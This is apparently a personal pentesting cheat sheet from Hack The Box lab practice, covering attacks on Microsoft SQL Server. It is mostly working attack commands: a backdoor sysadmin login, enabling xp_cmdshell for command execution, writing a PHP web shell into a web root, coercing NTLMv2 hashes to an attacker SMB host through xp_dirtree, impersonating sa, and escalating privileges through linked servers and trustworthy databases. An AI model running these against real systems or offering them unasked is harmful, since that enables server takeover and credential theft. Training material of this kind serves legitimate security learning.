[1433] MSSQL
dbeaver GUI
To install dbeaver using a Debian package we can download the release .deb package from https://github.com/dbeaver/dbeaver/releases and execute the following command:
Intrusionz3r0X@htb[/htb]$ sudo dpkg -i dbeaver-<version>.deb
Intrusionz3r0X@htb[/htb]$ dbeaver &
MSSQL
default system schemas/databases:
master - keeps the information for an instance of SQL Server.
msdb - used by SQL Server Agent.
model - a template database copied for each new database.
resource - a read-only database that keeps system objects visible in every database on the server in the sys schema.
tempdb - keeps temporary objects for SQL queries.
Basic Enumeration
# Get version
select @@version;
# Get user
select user_name();
# Get databases
SELECT name FROM master.dbo.sysdatabases;
# Use database
USE master
#Get table names
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
#List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
#List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
#Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
EXEC sp_addsrvrolemember 'hacker', 'sysadmin'
#Get Servername
select @@servername
#Enumerate links
enum_links
#Use a link
use_link [NAME]
MSSQLPWNER tool
mssqlpwner internal.zsm.local/'mssql_svc'@192.168.210.19 -windows-auth interactive
Advance Enumeration and techniques
#Enumeration MSSQL by using nmap
Intrusionz3r0X@htb[/htb]$ sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248
#Metasploit enumeration.
auxiliary/scanner/mssql/mssql_ping
#Interact with MSSQL
Intrusionz3r0X@htb[/htb]$ impacket-mssqlclient Administrator@10.129.201.248 -windows-auth
Intrusionz3r0X@htb[/htb]$ impacket-mssqlclient [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
Intrusionz3r0X@htb[/htb]$ impacket-mssqlclient [-db volume] -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
# Using sqsh (if you are on Linux)
Intrusionz3r0X@htb[/htb]$ sqsh -S <IP> -U <Username> -P <Password> -D <Database>
## In case Windows Auth using "." as domain name for local user
Intrusionz3r0X@htb[/htb]$ sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
Intrusionz3r0X@htb[/htb]$ sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!'
## In sqsh you need to use GO after writing the query to send it
1> select 1;
2> go
## MYSQL (Port: 3306)
#Windows (SQLCMD if you are on Windows)
C:\htb> sqlcmd -S 10.129.20.13 -U username -P Password123
C:\htb> sqlcmd -S SRVMSSQL -U julio -P 'MyPassword!' -y 30 -Y 30
Enable XP_CMDSHELL
#How to enable XP_CMDSHELL
EXECUTE sp_configure 'show advanced options', 1
RECONFIGURE
EXECUTE sp_configure 'xp_cmdshell', 1
RECONFIGURE
Write Files
#Enable Ole Automation Procedures to allow us to write files
1> sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> sp_configure 'Ole Automation Procedures', 1
6> GO
7> RECONFIGURE
8> GO
#Create file
1> DECLARE @OLE INT
2> DECLARE @FileID INT
3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
6> EXECUTE sp_OADestroy @FileID
7> EXECUTE sp_OADestroy @OLE
8> GO
Read Local Files
#Read Local Files in MSSQL
1> EXECUTE('SELECT * FROM OPENROWSET(BULK N''C:\\Windows\\System32\\drivers\\etc\\hosts'', SINGLE_CLOB) AS Contents') AT [LOCAL.TEST.LINKED.SRV];
2> GO
Capture NTLMv2 Hash
#Capture NTLMv2 through the MSSQL by using xp_dirtree
# 1. Start SMB Server
Intrusionz3r0X@htb[/htb]$ sudo responder -I tun0
Intrusionz3r0X@htb[/htb]$ sudo impacket-smbserver share ./ -smb2support
#2. Use the desired method
1> EXEC master..xp_dirtree '\\10.10.110.17\share\'
2> GO
#Capture NTLMv2 through the MSSQL by using xp_subdirs
1> EXEC master..xp_subdirs '\\10.10.110.17\share\"
2> GO
Impersonate Users
#----------Impersonate Existing Users with MSSQL----------
1> USE master
2> GO
#Identify Users that We Can Impersonate
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> GO
#Verifying our Current User and Role (0:Non-SysAdmin 1:SysAdmin)
1> SELECT SYSTEM_USER
2> SELECT IS_SRVROLEMEMBER('sysadmin')
3> go
#Impersonating the SA User
1> EXECUTE AS LOGIN = 'sa'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> GO
Linked Servers exploitation on MSSQL
#Communicate with Other Databases with MSSQL using a Linked servers
#isremote = 1: remote server
#isremote = 0: linked server
#Identify linked Servers in MSSQL
1> SELECT srvname, isremote FROM sysservers
2> GO
#Execute command in linked server.
1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
2> GO
Cross Forest SQL Server Links Abuse
#Enumerate SQL Server Links
PS C:\Tools> import-module .\PowerUpSQL.ps1
PS C:\Tools> Get-SQLServerLink
#Enumerate login rights for Jimmy
PS C:\Tools> Get-SQLQuery -Query "EXEC sp_helplinkedsrvlogin"
Exploitation on Windows
#verify if the current user has sysadmin rights on the linked server (1: sysadmin)
select * from openquery("SQL02\SQLEXPRESS",'select IS_SRVROLEMEMBER(''sysadmin'')')
#Enable XP_CMDSHELL
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "SQL02\SQLEXPRESS"
#Execute commands
EXECUTE('xp_cmdshell "whoami"') AT "SQL02\SQLEXPRESS"
Exploitation on Linux
#Authenticate on MSSQL
Intrusionz3r0@htb[/htb]$ mssqlclient.py jimmy@10.129.229.188 -windows-auth
#Enumerate SQL Server Links and Login Rights
SQL (inlanefreight\jimmy guest@master)> enum_links
#Use link server
SQL (inlanefreight\jimmy guest@master)> use_link "SQL02\SQLEXPRESS"
#Enable XP_CMDSHELL
SQL >"SQL02\SQLEXPRESS" (sa dbo@master)> enable_xp_cmdshell
#Execute commands
SQL >"SQL02\SQLEXPRESS" (sa dbo@master)> xp_cmdshell whoami
Trustworthy Databases
If our user hasn't been granted remote login permissions as a sysadmin (sa), but instead has been provided public privileges as a local SQL user, we can pursue a strategy to enumerate trusted databases on the targeted linked server. Our objective would be to determine if the user holds the db_owner role for any trusted database. If such a database is identified, we can create a stored procedure to enable xp_cmdshell, ensuring it executes under the context of the OWNER, which typically would be the sa user.
Requirements
Identified a trustworthy database
Confirm our current user's login name
Confirm our current user has the db_owner role on the database
Verify the database owner is sa
Enumerate Trustworthy Databases
#Enumerate SQL Server Links
PS C:\Tools> import-module .\PowerUpSQL.ps1
PS C:\Tools> Get-SQLServerLink
#Retrieve the login identification name
select * from openquery("SQL02\SQLEXPRESS",'select SUSER_NAME()')
#Check if we have public access rights
select * from openquery("SQL02\SQLEXPRESS",'select IS_SRVROLEMEMBER(''public'')')
select * from openquery("SQL02\SQLEXPRESS",'select IS_SRVROLEMEMBER(''sysadmin'')')
#Retrieve Databases
select * from openquery("SQL02\SQLEXPRESS",'select name FROM master.dbo.sysdatabases')
#Identify databases that have TRUSTWORTHY enabled (1: trustworthiness enabled)
select * from openquery("SQL02\SQLEXPRESS",'SELECT a.name,b.is_trustworthy_on FROM master..sysdatabases as a INNER JOIN sys.databases as b ON a.name=b.name;')
#Verify if our user had db_owner role
EXEC ('sp_helpuser') AT "SQL02\SQLEXPRESS"
#Verify the owner of the database (1: owner=sa)
select * from openquery("SQL02\SQLEXPRESS",'SELECT name as database_name , SUSER_NAME(owner_sid) AS owner , is_trustworthy_on AS TRUSTWORTHY from sys.databases;')
Exploitation on Windows
#verify if the IS_RPC_OUT_ENABLED option is enabled.
select is_rpc_out_enabled from sys.servers where name='SQL02\SQLEXPRESS'
#Create procedure as sysadmin
EXEC ('CREATE PROCEDURE sp_escalate WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember ''htb-dbuser'',''sysadmin''') AT "SQL02\SQLEXPRESS"
#verify the privileges of the current user once again
EXEC ('sp_escalate;SELECT IS_SRVROLEMEMBER(''sysadmin'');
SELECT SUSER_NAME()') AT "SQL02\SQLEXPRESS"
#Enable XP_CMDShell
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "SQL02\SQLEXPRESS"
#Execute commands:
EXECUTE('xp_cmdshell "whoami"') AT "SQL02\SQLEXPRESS"
Exploitation on Linux
#Enumerate linked database
enum_links
#Use a linked server
use_link "SQL02\SQLEXPRESS"
#Enumerate Trustworthy Databases (1: enabled)
enum_db
#verify whether our currently identified user holds the db_owner role
enum_users
#Verify databases owners
SELECT name as database_name, SUSER_NAME(owner_sid) AS owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases;
#Use database
USE "htb-reports"
#Create Procedure
CREATE PROCEDURE sp_escalate WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'htb-dbuser','sysadmin'
#Execute Procedure
EXEC sp_escalate
#Verify the Sysadmin right on current user
SELECT is_srvrolemember('sysadmin')
#Enable XP_CMDSHELL
exec master.dbo.sp_configure "show advanced options",1;RECONFIGURE;exec master.dbo.sp_configure "xp_cmdshell", 1;RECONFIGURE;
#Execute commands
exec master..xp_cmdshell "whoami"